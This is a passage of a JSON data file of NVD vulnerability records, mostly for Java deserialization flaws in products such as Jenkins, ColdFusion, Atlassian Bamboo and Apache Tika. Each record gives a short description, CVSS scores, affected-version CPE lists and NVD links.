"cpe:/a:jenkins:jenkins:2.31"], "id": "CVE-2016-9299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.19.2:*:*:*:lts:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.31:*:*:*:-:*:*:*"]}, {"lastseen": "2023-08-07T06:34:22", "description": "Intel McAfee ePolicy Orchestrator (ePO) 4.6.9 and earlier, 5.0.x, 5.1.x before 5.1.3 Hotfix 1106041, and 5.3.x before 5.3.1 Hotfix 1106041 allow remote attackers to execute arbitrary code via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2016-01-08T20:59:00", "type": "cve", "title": "CVE-2015-8765", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8765"], "modified": "2019-02-14T19:21:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator:5.0.1", "cpe:/a:mcafee:epolicy_orchestrator:4.6.9"], "id": "CVE-2015-8765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mcafee:epolicy_orchestrator:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epolicy_orchestrator:4.6.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-28T06:48:43", "description": "Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-01T08:29:00", "type": "cve", "title": "CVE-2017-11283", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283"], "modified": "2020-09-04T14:09:00", "cpe": ["cpe:/a:adobe:coldfusion:2016", "cpe:/a:adobe:coldfusion:11.0"], "id": "CVE-2017-11283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11283", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:coldfusion:2016:update1:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update6:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update9:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update5:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update10:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update7:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update11:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update8:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update12:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update1:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:05:43", "description": "OpenText Documentum D2 (formerly EMC Documentum D2) 4.x allows remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the BeanShell (bsh) and Apache Commons Collections (ACC) libraries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-22T16:59:00", "type": "cve", "title": "CVE-2017-5586", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5586"], "modified": "2017-03-01T02:59:00", "cpe": ["cpe:/a:opentext:documentum_d2:4.6", "cpe:/a:opentext:documentum_d2:4.1", "cpe:/a:opentext:documentum_d2:4.5", "cpe:/a:opentext:documentum_d2:4.0", "cpe:/a:opentext:documentum_d2:4.2", "cpe:/a:opentext:documentum_d2:4.4", "cpe:/a:opentext:documentum_d2:4.3"], "id": "CVE-2017-5586", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5586", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:opentext:documentum_d2:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:33:39", "description": "Remote Code Execution is possible in Code42 CrashPlan 5.4.x via the org.apache.commons.ssl.rmi.DateRMI Java class, because (upon instantiation) it creates an RMI server that listens on a TCP port and deserializes objects sent by TCP clients.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-27T18:29:00", "type": "cve", "title": "CVE-2017-9830", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830"], "modified": "2017-07-05T17:57:00", "cpe": ["cpe:/a:code42:crashplan:5.4"], "id": "CVE-2017-9830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9830", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:code42:crashplan:5.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:47:13", "description": "JBoss RESTEasy before version 3.1.2 could be forced into parsing a request with YamlProvider, resulting in unmarshalling of potentially untrusted data which could allow an attacker to execute arbitrary code with RESTEasy application permissions.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-09T20:29:00", "type": "cve", "title": "CVE-2016-9606", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-12T10:29:00", "cpe": ["cpe:/a:redhat:resteasy:3.1.1"], "id": "CVE-2016-9606", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9606", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redhat:resteasy:3.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-07T05:55:29", "description": "An unspecified resource in Atlassian Bamboo before 5.9.9 and 5.10.x before 5.10.0 allows remote attackers to execute arbitrary Java code via serialized data to the JMS port.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T19:59:00", "type": "cve", "title": "CVE-2015-8360", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8360"], "modified": "2018-10-09T19:58:00", "cpe": ["cpe:/a:atlassian:bamboo:3.4.1", "cpe:/a:atlassian:bamboo:5.9.2", "cpe:/a:atlassian:bamboo:4.4.5", "cpe:/a:atlassian:bamboo:3.0.2", "cpe:/a:atlassian:bamboo:3.1.1", "cpe:/a:atlassian:bamboo:4.4.2", "cpe:/a:atlassian:bamboo:2.5", "cpe:/a:atlassian:bamboo:3.2", "cpe:/a:atlassian:bamboo:3.4.2", "cpe:/a:atlassian:bamboo:3.4.3", "cpe:/a:atlassian:bamboo:4.4", "cpe:/a:atlassian:bamboo:3.4.5", "cpe:/a:atlassian:bamboo:5.7.2", "cpe:/a:atlassian:bamboo:5.1", "cpe:/a:atlassian:bamboo:5.8.5", "cpe:/a:atlassian:bamboo:5.0.1", "cpe:/a:atlassian:bamboo:2.5.1", "cpe:/a:atlassian:bamboo:3.3.4", "cpe:/a:atlassian:bamboo:2.5.2", "cpe:/a:atlassian:bamboo:4.0.1", "cpe:/a:atlassian:bamboo:4.2.1", "cpe:/a:atlassian:bamboo:2.6.2", "cpe:/a:atlassian:bamboo:2.7.2", "cpe:/a:atlassian:bamboo:3.0", "cpe:/a:atlassian:bamboo:4.4.4", "cpe:/a:atlassian:bamboo:2.5.3", "cpe:/a:atlassian:bamboo:5.9.1", "cpe:/a:atlassian:bamboo:4.0", "cpe:/a:atlassian:bamboo:5.7.1", "cpe:/a:atlassian:bamboo:4.4.8", "cpe:/a:atlassian:bamboo:5.2.2", "cpe:/a:atlassian:bamboo:5.5", "cpe:/a:atlassian:bamboo:3.3.3", "cpe:/a:atlassian:bamboo:2.4", "cpe:/a:atlassian:bamboo:4.1", "cpe:/a:atlassian:bamboo:5.8", "cpe:/a:atlassian:bamboo:5.9.4", "cpe:/a:atlassian:bamboo:4.3.1", "cpe:/a:atlassian:bamboo:2.6", "cpe:/a:atlassian:bamboo:5.2.1", "cpe:/a:atlassian:bamboo:5.6.2", "cpe:/a:atlassian:bamboo:3.1.4", "cpe:/a:atlassian:bamboo:5.1.1", "cpe:/a:atlassian:bamboo:4.4.1", "cpe:/a:atlassian:bamboo:4.2", "cpe:/a:atlassian:bamboo:3.3.2", "cpe:/a:atlassian:bamboo:5.8.1", "cpe:/a:atlassian:bamboo:4.3.2", "cpe:/a:atlassian:bamboo:4.3.4", "cpe:/a:atlassian:bamboo:2.6.1", "cpe:/a:atlassian:bamboo:3.1", "cpe:/a:atlassian:bamboo:2.7.3", "cpe:/a:atlassian:bamboo:2.4.1", "cpe:/a:atlassian:bamboo:3.2.2", "cpe:/a:atlassian:bamboo:2.7", "cpe:/a:atlassian:bamboo:2.3.1", "cpe:/a:atlassian:bamboo:5.6", "cpe:/a:atlassian:bamboo:4.3.3", "cpe:/a:atlassian:bamboo:4.3", "cpe:/a:atlassian:bamboo:5.9", "cpe:/a:atlassian:bamboo:5.0", "cpe:/a:atlassian:bamboo:5.9.7", "cpe:/a:atlassian:bamboo:3.0.1", "cpe:/a:atlassian:bamboo:4.1.1", "cpe:/a:atlassian:bamboo:3.3", "cpe:/a:atlassian:bamboo:5.8.2", "cpe:/a:atlassian:bamboo:2.7.4", "cpe:/a:atlassian:bamboo:5.3", "cpe:/a:atlassian:bamboo:2.5.5", "cpe:/a:atlassian:bamboo:3.4", "cpe:/a:atlassian:bamboo:4.4.3", "cpe:/a:atlassian:bamboo:3.4.4", "cpe:/a:atlassian:bamboo:3.3.1", "cpe:/a:atlassian:bamboo:4.1.2", "cpe:/a:atlassian:bamboo:3.0.3", "cpe:/a:atlassian:bamboo:5.7", "cpe:/a:atlassian:bamboo:2.4.3", "cpe:/a:atlassian:bamboo:5.4.2", "cpe:/a:atlassian:bamboo:2.7.1", "cpe:/a:atlassian:bamboo:3.1.3", "cpe:/a:atlassian:bamboo:5.6.1", "cpe:/a:atlassian:bamboo:5.2", "cpe:/a:atlassian:bamboo:2.4.2", "cpe:/a:atlassian:bamboo:2.6.3", "cpe:/a:atlassian:bamboo:5.4", "cpe:/a:atlassian:bamboo:5.9.3", "cpe:/a:atlassian:bamboo:5.4.1"], "id": "CVE-2015-8360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bamboo:5.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:40:31", "description": "Apache Tika before 1.14 allows Java code execution for serialized objects embedded in MATLAB files. The issue exists because Tika invokes JMatIO to do native deserialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "cve", "title": "CVE-2016-6809", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6809"], "modified": "2020-08-19T19:17:00", "cpe": ["cpe:/a:apache:tika:1.13", "cpe:/a:apache:nutch:2.3.1"], "id": "CVE-2016-6809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:nutch:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tika:1.13:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-07T05:45:00", "description": "The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to execute arbitrary code via a crafted serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the \"Groovy variant in 'ysoserial'\".", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "cve", "title": "CVE-2015-8103", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8103"], "modified": "2019-12-17T17:41:00", "cpe": ["cpe:/a:jenkins:jenkins:1.637", "cpe:/a:jenkins:jenkins:1.625.1", "cpe:/a:redhat:openshift:2.0", "cpe:/a:redhat:openshift:3.1"], "id": "CVE-2015-8103", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:1.625.1:*:*:*:lts:*:*:*", "cpe:2.3:a:jenkins:jenkins:1.637:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.1:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:openshift:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:36:42", "description": "Atlassian Bamboo before 5.11.4.1 and 5.12.x before 5.12.3.1 does not properly restrict permitted deserialized classes, which allows remote attackers to execute arbitrary code via vectors related to XStream Serialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-02T16:59:00", "type": "cve", "title": "CVE-2016-5229", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5229"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/a:atlassian:bamboo:5.12.1", 